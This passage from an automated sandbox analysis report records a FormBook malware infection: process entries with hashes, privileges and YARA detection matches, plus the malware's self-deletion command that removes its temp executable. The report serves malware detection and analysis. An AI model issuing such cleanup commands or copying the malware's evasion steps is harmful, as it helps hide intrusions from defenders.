                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        Target ID:8
                                        Start time:17:22:16
                                        Start date:13/05/2022
                                        Path:C:\Windows\SysWOW64\svchost.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\svchost.exe
                                        Imagebase:0xb20000
                                        File size:20992 bytes
                                        MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

                                        Target ID:9
                                        Start time:17:22:21
                                        Start date:13/05/2022
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del "C:\Users\user\AppData\Local\Temp\fdvucso.exe"
                                        Imagebase:0x4a7f0000
                                        File size:302592 bytes
                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        No disassembly